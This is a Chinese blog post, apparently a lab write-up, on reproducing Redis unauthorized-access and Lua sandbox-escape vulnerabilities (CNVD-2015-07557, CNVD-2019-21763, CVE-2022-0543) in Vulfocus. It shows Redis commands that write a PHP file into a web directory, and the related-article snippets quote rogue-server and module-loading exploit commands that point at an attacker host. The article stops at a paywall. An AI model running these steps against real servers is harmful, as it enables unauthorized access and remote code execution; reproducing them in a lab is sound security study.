Redis漏洞总结--未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)

最新推荐文章于 2025-05-19 20:58:13 发布
原创 最新推荐文章于 2025-05-19 20:58:13 发布 · 1.5k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#redis #web安全 #安全 #数据库

本文围绕Redis的未授权访问及沙箱绕过漏洞展开。采用Vulfocus靶场复现环境,介绍了CNVD - 2015 - 07557、CNVD - 2019 - 21763未授权访问漏洞的影响版本、探测与利用方法,还提及沙箱绕过CVE - 2022 - 0543漏洞,给出对应自动化脚本及使用方法。

Redis未授权–沙箱绕过–(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)

目录标题

环境复现

采用Vulfocus靶场进行环境复现,官网docker搭建有问题,具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败

CNVD-2015-07557未授权访问

影响版本

Redis <= 5.0.5

漏洞探测

使用端口扫描工具等探测到目标主机使用了Redis服务
对于Redis服务的未授权访问,首先需要确认Redis未授权是否存在,使用Redis数据库客户端进行连接测试,如何没有密码,即未授权漏洞存在。
客户端连接工具Another Redis Desktop Manager
具体表现如下
在这里插入图片描述

漏洞利用

漏洞利用有三种利用方式,每种方式都有限制条件,本质就是使用Redis数据库操作语句在目标主机进行写入文件。

  • 写入Webshell
    利用条件:Web目录权限可读写
config set dir /tmp            #设置WEB写入目录
config set dbfilename 1.php    #设置写入文件名
set test "<?php phpinfo();?>"  #设置写入文件代码
bgsave                         #保存执行
save
最低0.47元/天 解锁文章
redis 未授权访问 (CNVD-2019-21763)
qq_32445755的博客
10-03 1237
近日,Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞,攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,风险较高。目前漏洞的利用方式已被公开。CNVD-2015-07557也可以复现。
漏洞复现】redis未授权访问
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-16 1477
Redis服务在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器.上只运行一个Redis进程, 当多个客户端同时访问时,服务器的处理能力是会有一-定程度的下降;即:在实际生产环境中,需要根据实际的需求来决定开启多少个Redis进程。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。....
vulfocus靶场redis 未授权访问漏洞CNVD-2015-07557
没有故事
04-18 1875
python3 redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost 攻击者服务器IP。>" #向文件中写入内容。config set dbfilename 1.php #写入文件。主从复制getshell,写入恶意的so文件达到执行系统命令的目的。config set dir /tmp #创建临时目录。利用条件:需要web目录有读写权限,只有读权限会失败。证明web目录具有写权限,可以进行利用。
cnvd_2015_07557-redis未授权访问rce漏洞复现-vulfocus复现
c0529的博客
06-10 1652
python3 redis-master.py -r 目的ip -p 目的端口 -L 47.100.167.248 -P 1111 -f RedisModulesSDK/exp.so -c "id"python3 redis-master.py -r 目的ip -p 目的端口 -L 攻击者ip -P 对应端口 -f RedisModulesSDK/exp.so -c "id"出了一个file,搜了一下是由于这个文件用python3写的,要检查一下你的服务器上是不是python版本3.0以上,用。
redis未授权访问-cnvd 2015-0755漏洞复现
weixin_53747497的博客
02-04 1036
未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
vulfocus漏洞学习——redis 未授权访问 (CNVD-2015-07557
最新发布
2401_88083440的博客
05-19 674
Redis 是一个免费开源的键值存储数据库,数据默认存到内存中,用简单的 C 语言编写,能通过网络访问。该漏洞的成因是:在默认情况下,Redis会绑定到 0.0.0.0:6379,这意味着Redis会直接暴露到公网上,而此时如果又没有设置密码认证,会导致任意用户在可以访问到目标服务器的情况下未授权访问Redis并读取Redis的数据,还可以利用Redis提供的命令将自己的ssh公钥写入目标服务器,从而导致可以直接进行ssh登录目标服务器。
redis-CNVD-2015-07557
m0_51369969的博客
07-13 946
redis设计缺陷,导致服务器被添加账号用于ssh远程登录
redis未授权访问(cnvd_2019_21763)
qq_14902381的博客
08-12 2651
redis未授权访问漏洞(cnvd_2019_21763)
Redis未授权访问漏洞
Kevin's Blog
06-11 954
一、写入WebShell 1.1 适用系统 Windows Linux 1.2 利用前提 Redis可扫到开放端口(对公网开放/渗透到内网环境) 没有设置IP访问限制,默认没有设置密码(在内网中很常见,公网基本绝迹) 可以知道web目录执行的绝对路径 存在写入权限 写入的动态脚本文件能够被执行 1.3 利用过程 》》可以通过站点报错拿到web路径 (这里略了,仅演示具体的操作) 》》使用redis客户端连入对方redis redis-cli -h <target-ip> 》》使用Redi
Redis Lua沙盒绕过RCE(CVE-2022-0543
qq_57163799的博客
08-19 1073
覆盖面极广的Redis未授权漏洞利用方式——全版本通用!!!
Redis Lua沙盒绕过命令执行(CVE-2022-0543
swordheart的博客
06-23 507
漏洞原理介绍Redis 是一个开源(BSD 许可)的内存数据结构存储,用作数据库、缓存和消息代理。Redis 是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。在 Ubuntu 发行版打包中,不慎在 Lua 沙箱中重新分发一个箱对象,攻击利用这个对象的加载动态库,可以使用从 liblua 加载模块,然后使用此模块执行任意命令;参考链接:漏洞版本 漏洞环境执行如下命令启动一个使用Ubuntu源安装的Redis 5.0.7服务器docker-compose up -d服务启动后,我
Redis未授权访问
sucker的博客
03-10 1505
/添加名为xxx的key,值为后面反弹shell的语句,5个星号代表每分钟执行一次,其中的\n同样是为了换行,避免crontab的语法错误。启动redis服务:需要两个文件 redis-server redis.conf(注意这两个并不是在同一级目录,根据自己当前所在目录进行调用。vim打开redis.conf文件,然后找到daemonize 值改为yes(后台启动,不然窗口一关服务就挂了)目标Redis可访问攻击者主节点的端口(默认6379),且出站连接未被防火墙拦截。
未授权漏洞vulfocu靶场实战
beichenyyds的博客
03-03 7503
rsync未授权漏洞 打开会有一个输入flag的文本框,所以我们需要查找flag如图 把网站的ip信息收集到如图 在kali终端进入 (root💀kali)-[~/vulhub/rsync]目录下输入 rsync rsync://123.58.236.76 :19358/src/ 上面也说了flag在tmp目录下所以输入 rsync rsync://123.58.236.76:19358/src/tmp/ 可以查到flag 如图 复制到靶场flag位置 可以看到
Redis未授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
MateSnake的博客
05-17 2309
Redis未授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
Redis未授权漏洞
qq_53086690的博客
04-19 144
今天找到了一个内网Redis未授权漏洞,来复现一下。 Redis一般情况下会绑定在0.0.0.0:6379 然后 因为涉及法律问题就没有继续搞。
漏洞复现 - - - 未授权访问漏洞Redis
weixin_67503304的博客
08-13 5306
未授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
redis未授权访问利用汇总
今天是几号的博客
03-17 1412
原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生成一个授权的key。/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名,比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。
Redis-desktop-manager 2019.1新版发布,Windows系统兼容性提升
Redis-desktop-manager 2019.1.zip是一个软件压缩包,包含了最新版本的Redis桌面管理工具。这个工具是Redis数据库管理者的得力助手,它提供了一个直观的界面来帮助用户更好地管理和操作Redis数据库。从描述中我们...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值